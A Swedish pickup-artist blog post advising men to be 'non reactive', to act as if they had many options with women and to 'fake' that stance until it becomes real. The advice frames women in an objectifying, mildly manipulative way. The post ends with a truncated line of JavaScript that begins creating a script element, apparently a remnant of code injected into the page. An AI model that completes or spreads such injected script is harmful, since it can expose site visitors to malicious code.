Att vara non reactive

Vi får oftast frågan hur vi kan vara så non reactive?

Hur gör man för att inte låta en tjej överta din tankeverksamhet och därmed hamna i position där du jagar henne?

Det gamla mystery mantran att vara förvald av andra kvinnor är det enda som hjälper. Du måste bete dig så som du hade mängder val när det gäller kvinnor i ditt liv! Skulle du verkligen ringa en tjej konstant om du visste att du hade 10 andra att prata och umgås med? Svaret är Nej. Om du är ny på detta så kan det ta tid att införskaffa dig en sådan social nätverk där du i princip kan lyfta upp luren och inom timmen så har du någon som knakar på din dörr. Ha respekt för att processen tar sin tid och ”fejka” beteendet tills du är där. Tro mig du hamnar där förr eller senare om du ger processen den tid det tar för att mogna.

Glöm inte bort att det roliga finns i resans gång. Det finns inget mer roligt för oss alla i the c-r crew än att prata om hur många gånger det går åt skogen för oss. När någon av oss lyckas med tricket att bli den sliskige killen och tjejen i princip springer därifrån brukar utlösa kaskader av skratt. Tro mig detta händer oss fortfarande från tid till tid och det är bara kul.

När du blir non reactive kommer magiska saker att hända! Du kommer förvandlas till magneten som kvinnor dras till. Jag brukar glömma bort att ringa dem! då ”fejkar” jag det inte jag glömmer verkligen bort dem. Nya äventyr väntar hela tiden runt hörnet. Interagerar du med tjejer tillräckligt länge så kommer du inse att varje vecka bjuder på något nytt. Varje gång du går ut innebär nya äventyr. Sluta dock inte gå ut. Gå ut och ställ dig själv mitt i korselden. Du kommer att märka att ditt beteende ändras med tiden och dina äventyr tredubblas!

Gör inte kvinnor till allt i ditt liv! De finns så mycket annat där ute. Hitta på roliga saker, träffa gamla vänner, hälsa på din familj, hoppa fallskärm, mecka med din cyckel, spela på din guitarr, lek med dina barn eller någons annan ifall du inte har några egna. Fyll ditt liv med äventyr.!

Sanji går omkring och sjunger på stan i tights och älskar konversations kriga om allt mellan himmel och jord, jag brottas med min son, älskar att måla och jaga theman och xtreeme om deras bloggposter. Nomaggiz fylls av inspiration av lyssna på föreläsningar hitta på evil utgångsplaner och lära sig minst en ny banter-line varje dag. Theman leker ständigt med sin low rider i bar överkropp, äter kvarg och bantrar med mig om russin.? Xtreeme spelar guitarr och skriver poesi. Låt kvinnorna komma till dig. Det kommer de att göra om du lever ett underbart liv som du trivs med.

Se värdet i de små detaljerna livet ger dig, Skriv en to-do lista med allt du ska göra under dagen och följ den. Fan jag blir glad till och med av betala räkningar. Idag är det sol och jag lever nice! idag är det regn och jag lever lika nice. Här om dagen pratade jag med en god vän till mig som har relations bekymmer. Bara vårt samtal gjorde att han blev gladare och det gjorde mig verkligen gott att få han på en bättre linje.

Sluta jaga dem och låt PU berika ditt liv och ej definerar det!

Ha en riktig skön måndag.

var d=document;var s=d.createElement(‘script’);